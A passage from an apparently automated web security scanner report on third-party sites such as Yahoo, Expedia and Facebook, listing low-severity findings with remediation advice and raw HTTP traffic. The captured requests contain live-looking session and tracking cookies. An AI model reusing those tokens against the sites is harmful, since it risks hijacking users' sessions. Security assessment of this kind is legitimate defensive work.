cs=B9HGesm1IFjYQnDiNlEWoQYuDLlwaVo5Qyo+3HXMfg2A2tlfl18NKdBpWjlA4dqxoyp5GnNqKaoQyfkqQGlaOUaOGnlQaVoP52nSOXBpbA9g4Vo5c3rKsWP6OXpTemk6A2pamdZ/nGpA/2wuQGlaedB5GhlwSVo5cGlaeTA5Kglw==;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.201. http://www.lijit.com/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/beacon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tpro_inst=deleted; expires=Sun, 13-Jun-2010 11:10:35 GMT; path=/; domain=.lijit.com
tpro=eJx9kcFuhSAQRf9l1uQFRFHeb3T50hCCqCQKBrRJY%2Fz3Mhjbt%2Bpuzs3MnblwwBrD4GYLzwNG63sbsVo0KvTRCAKDvamuTwJ6LL1csQo1ygiwDG0BnqFTvEbgFQHeqFqWUQINVeu8J6QKjaI2xcno3aAou2w%2BRKWX21cnp30GApNL662GbcIjabYwk5v7aD3a%2BIANbUPg215LmtzhvAlLWUMVpyhnB06VKHUlCQiqGC3EMQp9u1LiijDP9orsg7%2BeoXmTM7YExqh7lcxUbuzOPJfchme8jlLBEz7WELcEOdUGT8ZpK0UlK3GS%2Fzp4zcX5%2BZs5f8zmMM7fPIEl9MqE3eMQgS8bkwv5RYA9KJznD5YChcM%3D; expires=Tue, 12-Jun-2012 11:10:36 GMT; path=/; domain=.lijit.com
ljt_csync=dotomi%2Crtb_turn%2C1%2Crtb_simplifi; expires=Wed, 12-Jun-2013 11:10:36 GMT; path=/; domain=.lijit.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.202. http://www.tiqiq.com/Tiqiq/PublisherHomePage.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tiqiq.com
Path:	/Tiqiq/PublisherHomePage.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TiqiqUser=82198505; domain=.tiqiq.com; expires=Sun, 13-Jun-2021 11:21:23 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.203. http://www.tiqiq.com/WebServices/EventsData.asmx/LogUserAction previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tiqiq.com
Path:	/WebServices/EventsData.asmx/LogUserAction

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TiqiqUser=82198505; domain=.tiqiq.com; expires=Sun, 13-Jun-2021 11:21:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.204. http://www.wtp101.com/admeld_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/admeld_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b; path=/; expires=Wed, 12 Jun 2013 11:21:52 GMT; domain=.wtp101.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.205. http://www.wtp101.com/cox_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/cox_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b; path=/; expires=Wed, 12 Jun 2013 11:02:48 GMT; domain=.wtp101.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.206. http://www22.glam.com/cTagsImgCmd.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.glam.com
Path:	/cTagsImgCmd.act

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

qcsegs=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771; expires=Wed, 15 Jun 2011 11:02:51 GMT; path=/; domain=.glam.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14. Password field with autocomplete enabled previous next
There are 7 instances of this issue:

https://login.yahoo.com/config/login_verify2
http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us
http://www.mavsmoneyball.com/fanposts
http://www.mavsmoneyball.com/mavericks-tickets
http://www.nba.com/mavericks/index_main.html
http://www.nba.com/mavericks/index_main.html

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

14.1. https://login.yahoo.com/config/login_verify2 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://login.yahoo.com
Path:	/config/login_verify2

Issue detail

The page contains a form with the following action URL:

https://login.yahoo.com/config/login?

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /config/login_verify2?.intl=us&.src=ym HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response

14.2. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

Issue detail

The page contains a form with the following action URL:

http://www.sbnation.com/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.3. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/2011/6/3/2205973/a-message-from-the-rest-of-us

Issue detail

The page contains a form with the following action URL:

http://www.sbnation.com/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.4. http://www.mavsmoneyball.com/fanposts previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/fanposts

Issue detail

The page contains a form with the following action URL:

http://www.sbnation.com/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.5. http://www.mavsmoneyball.com/mavericks-tickets previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/mavericks-tickets

Issue detail

The page contains a form with the following action URL:

http://www.sbnation.com/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.6. http://www.nba.com/mavericks/index_main.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.nba.com
Path:	/mavericks/index_main.html

Issue detail

The page contains a form with the following action URL:

https://oss.ticketmaster.com/cgi/request.cgi?utm_campaign=ticketcentral&utm_medium=fragment&utm_source=mavsdotcom&utm_content=hub&utm_term=account

The form contains the following password field with autocomplete enabled:

iPIN

Request

Response

14.7. http://www.nba.com/mavericks/index_main.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.nba.com
Path:	/mavericks/index_main.html

Issue detail

The page contains a form with the following action URL:

https://oss.ticketmaster.com/cgi/request.cgi

The form contains the following password field with autocomplete enabled:

iPIN

Request

Response

15. Source code disclosure previous next
There are 4 instances of this issue:

/static/default/default/images/infosite/rating_bar.gif
/static/default/default/images/infosite/videoPlayLarge.gif
/static/fusion/v2.3/images/buttonBG.png
/static/fusion/v2.3/images/iconsSprites.png

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

15.1. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.expedia.com
Path:	/static/default/default/images/infosite/rating_bar.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/infosite/rating_bar.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|112321680|||||||||MCI|20110713|; aspp=v.1,0|112321680|||||||||MCI|20110713|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1348-1306934969334"
Last-Modified: Wed, 01 Jun 2011 13:29:29 GMT
Content-Length: 1348
Date: Mon, 13 Jun 2011 11:21:53 GMT
Connection: close

GIF89ab........9..L.._.._..r..L...........
..'...............!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...

15.2. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.expedia.com
Path:	/static/default/default/images/infosite/videoPlayLarge.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/infosite/videoPlayLarge.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1275-1306934815898"
Last-Modified: Wed, 01 Jun 2011 13:26:55 GMT
Content-Length: 1275
Date: Mon, 13 Jun 2011 11:21:52 GMT
Connection: close

GIF89a-.-......i.f.......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...

15.3. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.expedia.com
Path:	/static/fusion/v2.3/images/buttonBG.png

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/fusion/v2.3/images/buttonBG.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|112321680|||||||||MCI|20110713|; aspp=v.1,0|112321680|||||||||MCI|20110713|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1636-1306934901311"
Last-Modified: Wed, 01 Jun 2011 13:28:21 GMT
Content-Length: 1636
Date: Mon, 13 Jun 2011 11:21:52 GMT
Connection: close

.PNG
.
...IHDR...,...S.............tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>..M"....PLTE..i..........2X.5].....9..f.....1.-O.....m.7J......F......3Y..........5\.0T....7N.4Z.....P.8R....7O.4\....8O..9.....=.....b..O.:`..p..E./S.....Y.....e..Q........k.6[....8P.7U.8S.......8T...
...[SNIP]...

15.4. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.expedia.com
Path:	/static/fusion/v2.3/images/iconsSprites.png

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/fusion/v2.3/images/iconsSprites.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|112321680|||||||||MCI|20110713|; aspp=v.1,0|112321680|||||||||MCI|20110713|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"10346-1306932030475"
Last-Modified: Wed, 01 Jun 2011 12:40:30 GMT
Content-Length: 10346
Date: Mon, 13 Jun 2011 11:21:52 GMT
Connection: close

.PNG
.
...IHDR...i..........wYA....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.....$.IDATx..TKN.0..W....6.V.K...8\.{...'...!.g ...!P.R`...... #M.8........gei.....l.....T)......F..D.F ....D.b.]^.{........<AQ.DE.z.{..Z...Cf...#...V.G.~}.....m.\J.t.).....s....kS.~f......nn."9EQfj
...[SNIP]...

16. Referer-dependent response previous next
There are 12 instances of this issue:

http://ad.yieldmanager.com/imp
http://adnxs.revsci.net/imp
http://ads.adbrite.com/adserver/vdi/742697
http://api.twitter.com/1/FanSided/lists//statuses.json
http://tag.admeld.com/ad/js/195/fsv/728x90/ros
http://www.apture.com/js/apture.js
http://www.expedia.com/hotel.h892034.Hotel-Information
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/widgets/like.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

16.1. http://ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.yieldmanager.com
Path:	/imp

Request 1

GET /imp?Z=160x600&s=1812134&_salt=3382701272&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://adopt.imiclk.com/emb/q?01AD=2-2-B0214141DED1291A4FF0463D9E06444BD5100362C216DF15CC667F2767BC1758-991AD395E12A9826D82DE593D62CFBCFAE28214D0237D0E3F7994E1DF381CB11&01RI=6BDF326C1D1D9D9&01NA=&size=160x600&m=3&l=1575606&c=162
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!*!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$%ST~!%.B?!1UC$!%`n`!!!!$!?5%!$8o10!ZmB)!'mla!'me'~~~~~~=$G!==%EaVM.jTN!#+s2!,x.^!%)<k!0)2c!$tyl!6Z#3!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Jsh='HAD!!!([!#2Jp!,x.^!%)<k!2A@,!$u!!!7MU<!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Ju6='T?<!!!([!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!#Jl?!,x.^!%)<k!.#:A!%IaL!H<'$!?5%!(L(6:!w1K*!(#l)!#Ae[!%f(g~~~~~=$L#)=%JbC!!!([!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; bh="b!!!%*!!!?J!!!!(=$_d[!!(1-!!!!+=%=]S!!*lZ!!!!#=$Wj6!!*oY!!!!$=%@(m!!,WM!!!!#=$Wj6!!-?2!!!!)=%@(m!!-O3!!!!)=%@(m!!..X!!!!'=$L=p!!/GK!!!!+=%=]S!!/GR!!!!+=%=]S!!/Ju!!!!#=$_d[!!/K$!!!!%=%=]S!!/i,!!!!*=%@(m!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!*=%@(m!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!%=%=]S!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!,=%=]S!!J<K!!!!,=%=]S!!J<O!!!!*=%=]S!!J<S!!!!,=%=]S!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!*=%@(m!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!$=%@(m!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!)=%@(m!!Zwb!!!!$=%@(m!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!,=%=]S!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!$=%@(m!!kl,!!!!$=%@(m!!mL?!!!!#=%=pu!!mo!!!!!$=%@(m!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!$=%@(m!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!*=%@(m!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!*=%=]S!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!*=%=]S!#MTF!!!!'=%=]S!#MTH!!!!,=%=]S!#MTI!!!!,=%=]S!#MTJ!!!!,=%=]S!#Nyi!!!!#=!eq^!#O29!!!!(=%@(m!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!*=%@(m!#Sq>!!!!#='>m<!#T,d~~!#T^F!!!!#=!yv!!#UDQ!!!!,=%=]S!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!$=%@(m!#Z8E!!!!)=%@(m!#]%`!!!!#=#33)!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Z!!!!!(=%@(m!#]Z#!!!!$=%@(m!#]w)!!!!*=%=]S!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!*=%@(m!#^d6!!!!#=#33)!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!)=%@(m!#`-Z!!!!$=%=]S!#`-[!!!!$=%=]S!#`U0!!!!$=%@(m!#`cS!!!!#=%id8!#a=6!!!!$=%@(m!#a=7!!!!$=%@(m!#a=9!!!!$=%@(m!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#bj8!!!!#=#mS:!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!(=%@(m!#c8X!!!!(=%@(m!#c8c!!!!(=%@(m!#c8i!!!!(=%@(m!#c8m!!!!(=%@(m!#c8p!!!!(=%@(m!#dCX!!!!%=!c>6!#dWf